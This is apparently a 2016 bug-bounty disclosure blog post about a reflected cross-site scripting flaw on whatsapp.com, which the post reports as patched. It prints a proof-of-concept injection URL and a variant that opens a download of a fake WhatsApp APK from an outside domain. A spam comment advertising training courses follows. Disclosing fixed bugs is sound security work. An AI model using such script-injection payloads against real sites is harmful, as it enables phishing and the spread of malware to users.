Sunday, 6 November 2016

WhatsApp : XSS vulnerability can be misused for Spreading Malware

bug bounty, cross-site scripting in Referer header, facebook bounty, facebook reward, Google bug bounty, whatsapp xss, xss in whats app 1 comment

WhatsApp XSS vulnerability can be misused for Spreading Malware

Little Insight:

[ According to FACEBOOK, This XSS could take advantage of the known domain to make phishing attacks easier or can be misused for Spreading Malware ]

Reward For Whatsapp XSS Vulnerability : 1000$

My Finding....

Domain: https://www.whatsapp.com

Poc url :

https://www.whatsapp.com/index.php/"><script>alert(document.domain)</script>

but you can think a little different

https://www.whatsapp.com/index.php/"><script>window.open("http://websecuritylog.com/whatsapp.apk")</script>

How this can be used to trick users to download a fake application (Malware - WhatsApp.apk) from other domain and easily can spreading malware..

More Information

The vulnerability mentioned here has been confirmed patched by the Facebook Security Team.

1 comment:

sheela rajesh12 April 2019 at 23:50
I am feeling great to read this.you gave a nice info for us.please update more.
JAVA Training in Chennai
Java training institute in chennai
Selenium Training in Chennai
Hadoop Training in Chennai
Python Training in Chennai
Software testing training in chennai
JAVA Training in Chennai
Java Training in Velachery
ReplyDelete
Replies

Add comment

Web Security Log

Sunday, 6 November 2016

WhatsApp : XSS vulnerability can be misused for Spreading Malware

WhatsApp XSS vulnerability can be misused for Spreading Malware

Little Insight:

More Information

1 comment:

Blog Archive

Popular Posts

Jon Us On Facebook

Follow Me On Facebook

Follow by Email